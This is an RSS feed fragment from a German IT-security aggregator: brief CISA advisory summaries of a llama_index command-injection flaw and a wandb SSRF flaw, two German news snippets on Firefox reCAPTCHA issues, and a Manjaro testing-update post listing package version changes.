<td>A command injection vulnerability exists in the RunGptLLM class of the llama_index library, version 0.9.47, used by the RunGpt framework from JinaAI to connect to Language Learning Models (LLMs). The vulnerability arises from the improper use of the eval function, allowing a malicious or compromised LLM hosting provider to execute arbitrary commands on the client's machine. This issue was fixed in version 0.10.13. The exploitation of this vulnerability could lead to a hosting provider gaining full control over client machines.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4181" target="_blank">CVE-2024-4181</a><br><a href="https://github.com/run-llama/llama_index/commit/d73715eaf0642705583e7897c78b9c8dd2d3a7ba" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/1a204520-598a-434e-b13d-0d34f2a5ddc1" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>wandb--wandb/wandb<br> </td>
<td>A Server-Side Request Forgery (SSRF) vulnerability exists in the wandb/wandb repository due to improper handling of HTTP 302 redirects. This issue allows team members with access to the 'User settings -&gt; Webhooks' function to exploit this vulnerability to access internal HTTP(s) servers. In severe cases, such as on AWS instances, this could potentially be abused to achieve remote code execution on the victim's machine. The vulnerability is present in the latest version of the repository.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4642" target="_blank">CVE-2024-4642</a><br><a href="https://huntr.com/bounties/055eb540-57f8-46d6-b858-3a9e22d347d9" target="_blank">security@huntr.dev</a></td>
</tr>
</tbody>
</table>
<p><a href="https://www.cisa.gov/#top">Back to top</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla gibt Google die Schuld an Captcha-Problemen in Firefox]]></title>
<description><![CDATA[Mozilla hat kürzlich ein Problem mit reCAPTCHA in seinem Firefox-Webbrowser...
Der Beitrag Mozilla gibt Google die Schuld an Captcha-Problemen in Firefox erschien zuerst auf WindowsArea.de.]]></description>
<link>https://tsecurity.de/de/2123879/windows-tipps/mozilla-gibt-google-die-schuld-an-captcha-problemen-in-firefox/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2123879/windows-tipps/mozilla-gibt-google-die-schuld-an-captcha-problemen-in-firefox/</guid>
<pubDate>Fri, 26 Apr 2024 06:22:40 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mozilla hat kürzlich ein Problem mit reCAPTCHA in seinem Firefox-Webbrowser...</p>
<p>Der Beitrag <a href="https://windowsarea.de/2024/05/mozilla-gibt-google-die-schuld-an-captcha-problemen-in-firefox/">Mozilla gibt Google die Schuld an Captcha-Problemen in Firefox</a> erschien zuerst auf <a href="https://windowsarea.de/">WindowsArea.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox: Derzeit Probleme mit reCAPTCHA]]></title>
<description><![CDATA[reCAPTCHA ist ein Service, der von Google bereitgestellt wird, um zu bestätigen, dass die Interaktion mit einer Website tatsächlich von einem Menschen und nicht von einem Bot ausgeführt wird. Da gibt es derzeit bestätigte Probleme mit Firefox unter Windows (könnt...Zum Beitrag: Firefox: Derzeit P...]]></description>
<link>https://tsecurity.de/de/2118548/it-nachrichten/firefox-derzeit-probleme-mit-recaptcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2118548/it-nachrichten/firefox-derzeit-probleme-mit-recaptcha/</guid>
<pubDate>Sun, 21 Apr 2024 17:19:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[reCAPTCHA ist ein Service, der von Google bereitgestellt wird, um zu bestätigen, dass die Interaktion mit einer Website tatsächlich von einem Menschen und nicht von einem Bot ausgeführt wird. Da gibt es derzeit bestätigte Probleme mit Firefox unter Windows (könnt...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/firefox-derzeit-probleme-mit-recaptcha/">Firefox: Derzeit Probleme mit reCAPTCHA</a>
</p><p>
Zum Blog: <a href="https://stadt-bremerhaven.de/">Caschys Blog</a>
</p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2024-04-24 - Wine 9.7, Kernel 6.9prc5, Firefox 125, WirePlumber]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Find out all about our current Gaming Laptop the Hero with Manjaro pre-installed from Spain!
Protect your personal data, keep yourself safe with Surfshark VPN: 85% OFF + 2 mo. FREE

Recent News

Manjaro Team member ...]]></description>
<link>https://tsecurity.de/de/2105008/unix-server/testing-update-2024-04-24-wine-97-kernel-69prc5-firefox-125-wireplumber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2105008/unix-server/testing-update-2024-04-24-wine-97-kernel-69prc5-firefox-125-wireplumber/</guid>
<pubDate>Thu, 11 Apr 2024 11:06:58 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="current-promotions-1" class="anchor" href="https://forum.manjaro.org/#current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Find out all about our current <strong>Gaming Laptop</strong> the <a href="https://hero.manjaro.org/">Hero</a> with Manjaro pre-installed from Spain!</li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">85% OFF + 2 mo. FREE</a></li>
</ul>
<h2><a name="recent-news-2" class="anchor" href="https://forum.manjaro.org/#recent-news-2"></a>Recent News</h2>
<ul>
<li>Manjaro Team member <a class="mention" href="https://forum.manjaro.org/u/romangg">@romangg</a> has a new library project with a guest post on <a href="https://www.phoronix.com/review/the-compositor-modules-como">Phoronix</a>.</li>
<li>Some Manjaro team members attended <a href="https://forum.manjaro.org/t/manjaro-at-fosdem-2024/156525">FOSDEM 2024</a> and we showed off a prototype of the upcoming <a href="https://neo.manjaro.org/">Orange Pi Neo Handheld Gaming Console</a>!</li>
<li>Check out the new <a href="https://hero.manjaro.org/">Manjaro Slimbook Hero</a>!</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2024-04-24-wine-9-7-kernel-6-9prc5-firefox-125-wireplumber/160443/1">(click for more details)</a>
<h2><a name="notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>Wine</strong> <a href="https://www.winehq.org/news/2024041901">9.7</a></li>
<li><strong>Kernel</strong> <a href="https://www.phoronix.com/news/Linux-6.9-rc5-Released">6.9.0rc5</a></li>
<li><strong>Firefox</strong> <a href="https://www.mozilla.org/en-US/firefox/125.0.2/releasenotes/">125.0.2</a></li>
<li><strong>WirePlumber</strong> <a href="https://gitlab.freedesktop.org/pipewire/wireplumber/-/releases/0.5.2">0.5.2</a></li>
</ul>
<p>A list of all package changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1004/raw">here</a></p>
<h2><a name="additional-info-4" class="anchor" href="https://forum.manjaro.org/#additional-info-4"></a>Additional Info</h2>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2024-04-24-wine-9-7-kernel-6-9prc5-firefox-125-wireplumber/160443/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<h2><a name="our-current-supported-kernels-5" class="anchor" href="https://forum.manjaro.org/#our-current-supported-kernels-5"></a>Our current supported kernels</h2>
<ul>
<li>linux419 4.19.312</li>
<li>linux54 5.4.274</li>
<li>linux510 5.10.215</li>
<li>linux515 5.15.156</li>
<li>linux61 6.1.87</li>
<li>linux66 6.6.28</li>
<li>linux68 6.8.7</li>
<li>linux69 6.9.0-rc5</li>
<li>linux61-rt 6.1.83_rt28</li>
<li>linux66-rt 6.6.23_rt28</li>
<li>linux67-rt 6.7_rt6</li>
</ul>
<h2><a name="package-changes-wed-apr-24-002621-cest-2024-6" class="anchor" href="https://forum.manjaro.org/#package-changes-wed-apr-24-002621-cest-2024-6"></a>Package Changes (Wed Apr 24 00:26:21 CEST 2024)</h2>
<ul>
<li>testing core x86_64:  3 new and 2 removed package(s)</li>
<li>testing extra x86_64:  1278 new and 1277 removed package(s)</li>
<li>testing multilib x86_64:  2 new and 2 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2024-04-22           2024-04-24
-------------------------------------------------------------------------------
                             linux69           6.9.0rc4-1           6.9.0rc5-1
                     linux69-headers           6.9.0rc4-1           6.9.0rc5-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2024-04-22           2024-04-24
-------------------------------------------------------------------------------
                           mpdecimal                    -              4.0.0-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2024-04-22           2024-04-24
-------------------------------------------------------------------------------
                             discord             0.0.51-1                    -
                gnome-control-center             46.0.1-1               46.1-2
    gnome-control-center-x11-scaling             46.0.1-1               46.1-2
                   linux69-acpi_call            1.2.2-0.5            1.2.2-0.6
                    linux69-bbswitch              0.8-0.5              0.8-0.6
                 linux69-broadcom-wl     6.30.223.271-0.5     6.30.223.271-0.6
                linux69-nvidia-390xx          390.157-0.5          390.157-0.6
                linux69-nvidia-470xx       470.239.06-0.5       470.239.06-0.6
                      linux69-nvidia           550.76-0.1           550.76-0.2
                   linux69-rtl8723bu         20240303-0.5         20240303-0.6
                    linux69-tp_smapi             0.44-0.5             0.44-0.6
                 linux69-vhba-module         20240202-0.5         20240202-0.6
     linux69-virtualbox-host-modules           7.0.16-0.1           7.0.16-0.2
                         mhwd-nvidia             550.76-1             550.76-2
                        mint-l-icons              1.6.9-1              1.7.0-1
                        mint-x-icons              1.6.7-1              1.6.8-1
                        mint-y-icons              1.7.4-1              1.7.5-1
                         nvidia-dkms             550.76-1             550.76-2
                        nvidia-utils             550.76-1             550.76-2
                       opencl-nvidia             550.76-1             550.76-2


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2024-04-22           2024-04-24
-------------------------------------------------------------------------------
                        aardvark-dns             1.10.0-1             1.10.0-2
                                agda             2.6.4-24             2.6.4-25
                     age-plugin-tkey              0.0.3-2              0.0.4-1
                              allure         0.11.0.0-138         0.11.0.0-139
                               arbtt          0.12.0.3-22          0.12.0.3-23
                             arch-hs         0.11.1.0-134         0.11.1.0-135
                                atac             0.13.0-1             0.14.0-1
                             blender           17:4.1.0-3           17:4.1.1-3
                                bnfc              2.9.5-1              2.9.5-2
                              bustle             0.8.0-50             0.8.0-51
                                c2hs           0.28.8-197           0.28.8-198
                           cabal-fmt          0.1.5.1-115          0.1.5.1-116
                       cabal-install           3.6.2.0-14           3.6.2.0-15
                          cabal-plan            0.7.2.2-1            0.7.2.2-2
                          cargo-deny            0.14.21-1            0.14.22-1
                          cargo-dist             0.13.2-1             0.13.3-1
                 cargo-semver-checks             0.30.0-1             0.31.0-1
                       cargo-shuttle             0.43.0-1             0.44.0-1
                           cbor-tool           0.2.2.0-80           0.2.2.0-81
                               cgrep           6.6.32-430           6.6.32-431
                           clash-ghc             1.8.0-17             1.8.0-18
                               cri-o             1.29.2-1             1.29.3-1
                             cryptol             3.0.0-56             3.0.0-57
                               darcs             2.18.1-4             2.18.1-6
                             dbeaver             24.0.2-1             24.0.3-1
                               dhall           1.41.2-149           1.41.2-150
                          dhall-bash           1.0.40-262           1.0.40-263
                          dhall-docs           1.0.11-103           1.0.11-104
                          dhall-json           1.7.11-169           1.7.11-170
                    dhall-lsp-server            1.1.2-190            1.1.2-191
                          dhall-yaml           1.2.11-171           1.2.11-172
                                dice             0.1.1-37             0.1.1-38
                             discord             0.0.50-1             0.0.51-1
                              docker           1:26.0.2-1           1:26.1.0-1
                      doublecmd-gtk2             1.1.12-1             1.1.13-2
                       doublecmd-qt5             1.1.12-1             1.1.13-2
                       doublecmd-qt6             1.1.12-1             1.1.13-2
                            earlyoom                1.8-1              1.8.1-1
                          electron27            27.3.11-1            27.3.11-2
                          electron28             28.3.1-1             28.3.1-2
                          electron29             29.3.1-1             29.3.1-2
                          electron30             30.0.1-1             30.0.1-2
                         emby-server            4.8.4.0-1            4.8.5.0-1
                              eslint              9.1.0-1              9.1.1-1
                           fastfetch              2.9.2-1             2.10.2-1
                           feedbackd              0.2.1-2                    -
                             firefox            125.0.1-1            125.0.2-1
           firefox-developer-edition            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-ach            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-af            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-an            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ar            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-ast            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-az            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-be            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-bg            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-bn            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-br            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-bs            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ca            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-ca-valencia      126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-cak            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-cs            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-cy            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-da            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-de            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-dsb            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-el            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-en-ca            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-en-gb            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-en-us            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-eo            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-es-ar            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-es-cl            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-es-es            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-es-mx            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-et            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-eu            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-fa            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ff            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-fi            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-fr            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-fur            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-fy-nl            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-ga-ie            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-gd            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-gl            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-gn            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-gu-in            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-he            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-hi-in            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-hr            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-hsb            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-hu            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-hy-am            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ia            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-id            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-is            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-it            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ja            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ka            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-kab            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-kk            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-km            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-kn            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ko            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-lij            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-lt            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-lv            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-mk            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-mr            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ms            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-my            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-nb-no            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-ne-np            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-nl            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-nn-no            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-oc            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-pa-in            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-pl            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-pt-br            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-pt-pt            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-rm            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ro            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ru            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-sat            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-sc            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-sco            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-si            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-sk            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-sl            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-son            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-sq            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-sr            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-sv-se            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-szl            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ta            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-te            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-tg            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-th            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-tl            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-tr            126.0b3-1            126.0b4-1
  firefox-developer-edition-i18n-trs            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-uk            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-ur            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-uz            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-vi            126.0b3-1            126.0b4-1
   firefox-developer-edition-i18n-xh            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-zh-cn            126.0b3-1            126.0b4-1
firefox-developer-edition-i18n-zh-tw            126.0b3-1            126.0b4-1
                    firefox-i18n-ach            125.0.1-1            125.0.2-1
                     firefox-i18n-af            125.0.1-1            125.0.2-1
                     firefox-i18n-an            125.0.1-1            125.0.2-1
                     firefox-i18n-ar            125.0.1-1            125.0.2-1
                    firefox-i18n-ast            125.0.1-1            125.0.2-1
                     firefox-i18n-az            125.0.1-1            125.0.2-1
                     firefox-i18n-be            125.0.1-1            125.0.2-1
                     firefox-i18n-bg            125.0.1-1            125.0.2-1
                     firefox-i18n-bn            125.0.1-1            125.0.2-1
                     firefox-i18n-br            125.0.1-1            125.0.2-1
                     firefox-i18n-bs            125.0.1-1            125.0.2-1
                     firefox-i18n-ca            125.0.1-1            125.0.2-1
            firefox-i18n-ca-valencia            125.0.1-1            125.0.2-1
                    firefox-i18n-cak            125.0.1-1            125.0.2-1
                     firefox-i18n-cs            125.0.1-1            125.0.2-1
                     firefox-i18n-cy            125.0.1-1            125.0.2-1
                     firefox-i18n-da            125.0.1-1            125.0.2-1
                     firefox-i18n-de            125.0.1-1            125.0.2-1
                    firefox-i18n-dsb            125.0.1-1            125.0.2-1
                     firefox-i18n-el            125.0.1-1            125.0.2-1
                  firefox-i18n-en-ca            125.0.1-1            125.0.2-1
                  firefox-i18n-en-gb            125.0.1-1            125.0.2-1
                  firefox-i18n-en-us            125.0.1-1            125.0.2-1
                     firefox-i18n-eo            125.0.1-1            125.0.2-1
                  firefox-i18n-es-ar            125.0.1-1            125.0.2-1
                  firefox-i18n-es-cl            125.0.1-1            125.0.2-1
                  firefox-i18n-es-es            125.0.1-1            125.0.2-1
                  firefox-i18n-es-mx            125.0.1-1            125.0.2-1
                     firefox-i18n-et            125.0.1-1            125.0.2-1
                     firefox-i18n-eu            125.0.1-1            125.0.2-1
                     firefox-i18n-fa            125.0.1-1            125.0.2-1
                     firefox-i18n-ff            125.0.1-1            125.0.2-1
                     firefox-i18n-fi            125.0.1-1            125.0.2-1
                     firefox-i18n-fr            125.0.1-1            125.0.2-1
                    firefox-i18n-fur            125.0.1-1            125.0.2-1
                  firefox-i18n-fy-nl            125.0.1-1            125.0.2-1
                  firefox-i18n-ga-ie            125.0.1-1            125.0.2-1
                     firefox-i18n-gd            125.0.1-1            125.0.2-1
                     firefox-i18n-gl            125.0.1-1            125.0.2-1
                     firefox-i18n-gn            125.0.1-1            125.0.2-1
                  firefox-i18n-gu-in            125.0.1-1            125.0.2-1
                     firefox-i18n-he            125.0.1-1            125.0.2-1
                  firefox-i18n-hi-in            125.0.1-1            125.0.2-1
                     firefox-i18n-hr            125.0.1-1            125.0.2-1
                    firefox-i18n-hsb            125.0.1-1            125.0.2-1
                     firefox-i18n-hu            125.0.1-1            125.0.2-1
                  firefox-i18n-hy-am            125.0.1-1            125.0.2-1
                     firefox-i18n-ia            125.0.1-1            125.0.2-1
                     firefox-i18n-id            125.0.1-1            125.0.2-1
                     firefox-i18n-is            125.0.1-1            125.0.2-1
                     firefox-i18n-it            125.0.1-1            125.0.2-1
                     firefox-i18n-ja            125.0.1-1            125.0.2-1
                     firefox-i18n-ka            125.0.1-1            125.0.2-1
                    firefox-i18n-kab            125.0.1-1            125.0.2-1
                     firefox-i18n-kk            125.0.1-1            125.0.2-1
                     firefox-i18n-km            125.0.1-1            125.0.2-1
                     firefox-i18n-kn            125.0.1-1            125.0.2-1
                     firefox-i18n-ko            125.0.1-1            125.0.2-1
                    firefox-i18n-lij            125.0.1-1            125.0.2-1
                     firefox-i18n-lt            125.0.1-1            125.0.2-1
                     firefox-i18n-lv            125.0.1-1            125.0.2-1
                     firefox-i18n-mk            125.0.1-1            125.0.2-1
                     firefox-i18n-mr            125.0.1-1            125.0.2-1
                     firefox-i18n-ms            125.0.1-1            125.0.2-1
                     firefox-i18n-my            125.0.1-1            125.0.2-1
                  firefox-i18n-nb-no            125.0.1-1            125.0.2-1
                  firefox-i18n-ne-np            125.0.1-1            125.0.2-1
                     firefox-i18n-nl            125.0.1-1            125.0.2-1
                  firefox-i18n-nn-no            125.0.1-1            125.0.2-1
                     firefox-i18n-oc            125.0.1-1            125.0.2-1
                  firefox-i18n-pa-in            125.0.1-1            125.0.2-1
                     firefox-i18n-pl            125.0.1-1            125.0.2-1
                  firefox-i18n-pt-br            125.0.1-1            125.0.2-1
                  firefox-i18n-pt-pt            125.0.1-1            125.0.2-1
                     firefox-i18n-rm            125.0.1-1            125.0.2-1
                     firefox-i18n-ro            125.0.1-1            125.0.2-1
                     firefox-i18n-ru            125.0.1-1            125.0.2-1
                    firefox-i18n-sat            125.0.1-1            125.0.2-1
                     firefox-i18n-sc            125.0.1-1            125.0.2-1
                    firefox-i18n-sco            125.0.1-1            125.0.2-1
                     firefox-i18n-si            125.0.1-1            125.0.2-1
                     firefox-i18n-sk            125.0.1-1            125.0.2-1
                     firefox-i18n-sl            125.0.1-1            125.0.2-1
                    firefox-i18n-son            125.0.1-1            125.0.2-1
                     firefox-i18n-sq            125.0.1-1            125.0.2-1
                     firefox-i18n-sr            125.0.1-1            125.0.2-1
                  firefox-i18n-sv-se            125.0.1-1            125.0.2-1
                    firefox-i18n-szl            125.0.1-1            125.0.2-1
                     firefox-i18n-ta            125.0.1-1            125.0.2-1
                     firefox-i18n-te            125.0.1-1            125.0.2-1
                     firefox-i18n-tg            125.0.1-1            125.0.2-1
                     firefox-i18n-th            125.0.1-1            125.0.2-1
                     firefox-i18n-tl            125.0.1-1            125.0.2-1
                     firefox-i18n-tr            125.0.1-1            125.0.2-1
                    firefox-i18n-trs            125.0.1-1            125.0.2-1
                     firefox-i18n-uk            125.0.1-1            125.0.2-1
                     firefox-i18n-ur            125.0.1-1            125.0.2-1
                     firefox-i18n-uz            125.0.1-1            125.0.2-1
                     firefox-i18n-vi            125.0.1-1            125.0.2-1
                     firefox-i18n-xh            125.0.1-1            125.0.2-1
                  firefox-i18n-zh-cn            125.0.1-1            125.0.2-1
                  firefox-i18n-zh-tw            125.0.1-1            125.0.2-1
                               fping                5.1-3                5.2-1
                               fwupd             1.9.16-1             1.9.18-1
                          fwupd-docs             1.9.16-1             1.9.18-1
                            geogebra        1:5.2.836.0-2        1:5.2.838.0-1
                           git-annex       10.20240227-14       10.20240227-16
                          git-repair        1.20230814-42        1.20230814-43
                          github-cli             2.48.0-1             2.48.0-2
                       gitlab-runner            16.10.0-1            16.11.0-1
                               glirc         2.39.0.1-198         2.39.0.1-199
                         gnome-boxes               46.0-1               46.1-1
                      gnome-calendar               46.1-1               46.1-2
             gnome-color-manager 3.36.0+r51+gcf7ee2b5-1 3.36.0+r62+g82000f1d-1
                   gnome-connections               46.0-2               46.0-3
                 gnome-initial-setup               46.0-1               46.0-2
                              greetd              0.9.0-3             0.10.0-1
                      greetd-agreety              0.9.0-3             0.10.0-1
                         gtranslator               46.0-1               46.1-1
              haskell-abstract-deque              0.3-205              0.3-206
                 haskell-adjunctions             4.4.2-90             4.4.2-91
                       haskell-aeson           2.1.2.1-43           2.1.2.1-44
         haskell-aeson-better-errors          0.9.1.1-101          0.9.1.1-102
                haskell-aeson-casing           0.2.0.0-86           0.2.0.0-87
                  haskell-aeson-diff          1.1.0.13-99         1.1.0.13-100
                haskell-aeson-pretty             0.8.10-3             0.8.10-4
                    haskell-aeson-qq            0.8.4-178            0.8.4-179
                  haskell-aeson-yaml          1.1.0.1-186          1.1.0.1-187
            haskell-algebraic-graphs              0.7-103              0.7-104
               haskell-ansi-terminal            0.11.4-64            0.11.4-66
              haskell-ansi-wl-pprint            0.6.9-416            0.6.9-418
                haskell-apply-refact           0.11.0.0-6           0.11.0.0-7
                    haskell-arch-web              0.2-108              0.2-109
                    haskell-arithmoi          0.13.0.0-43          0.13.0.0-44
                      haskell-arrows          0.4.4.2-125          0.4.4.2-126
               haskell-asn1-encoding            0.9.6-229            0.9.6-230
                  haskell-asn1-parse            0.9.5-229            0.9.5-230
                  haskell-asn1-types            0.3.4-208            0.3.4-209
                       haskell-assoc            1.0.2-258            1.0.2-260
                       haskell-async             2.2.5-25             2.2.5-27
              haskell-atomic-primops              0.8.5-4              0.8.5-5
                haskell-atomic-write          0.2.0.7-259          0.2.0.7-260
                  haskell-attoparsec            0.14.4-73            0.14.4-74
            haskell-attoparsec-aeson           2.1.0.0-27           2.1.0.0-28
          haskell-attoparsec-iso8601           1.1.0.0-49           1.1.0.0-50
                haskell-authenticate           1.3.5.2-18           1.3.5.2-20
          haskell-authenticate-oauth              1.7-221              1.7-222
                 haskell-auto-update            0.1.6-336            0.1.6-337
                         haskell-aws             0.24-124             0.24-126
                     haskell-barbies           2.0.5.0-15           2.0.5.0-16
       haskell-base-compat-batteries            0.12.2-81            0.12.2-83
                haskell-base-orphans           0.8.8.2-12           0.8.8.2-13
           haskell-base16-bytestring           1.0.2.0-79           1.0.2.0-80
                      haskell-base64           0.4.2.4-68           0.4.2.4-69
           haskell-base64-bytestring          1.2.1.0-103          1.2.1.0-104
               haskell-basic-prelude            0.7.0-267            0.7.0-268
                     haskell-bencode          0.6.1.1-199          0.6.1.1-200
                  haskell-bifunctors               5.6-69               5.6-71
                       haskell-bimap             0.5.0-57             0.5.0-58
                         haskell-bin             0.1.3-23             0.1.3-24
              haskell-binary-conduit            1.3.1-428            1.3.1-429
            haskell-binary-instances             1.0.4-12             1.0.4-13
              haskell-binary-orphans           1.0.4.1-37           1.0.4.1-38
               haskell-binary-parser            0.5.7.6-4            0.5.7.6-5
               haskell-binary-tagged            0.3.1-180            0.3.1-181
                      haskell-bitvec           1.1.3.0-90           1.1.3.0-91
                     haskell-bitwise          1.0.0.1-191          1.0.0.1-192
                  haskell-blaze-html          0.9.1.2-225          0.9.1.2-226
                haskell-blaze-markup            0.8.3.0-9           0.8.3.0-10
               haskell-blaze-textual           0.2.3.1-25           0.2.3.1-26
                  haskell-bower-json           1.1.0.0-80           1.1.0.0-81
                       haskell-boxes            0.1.5-238            0.1.5-239
                  haskell-breakpoint           0.1.2.2-37           0.1.2.2-38
                       haskell-brick               1.7-12               1.7-13
                   haskell-brick0.71            0.71.1-84            0.71.1-85
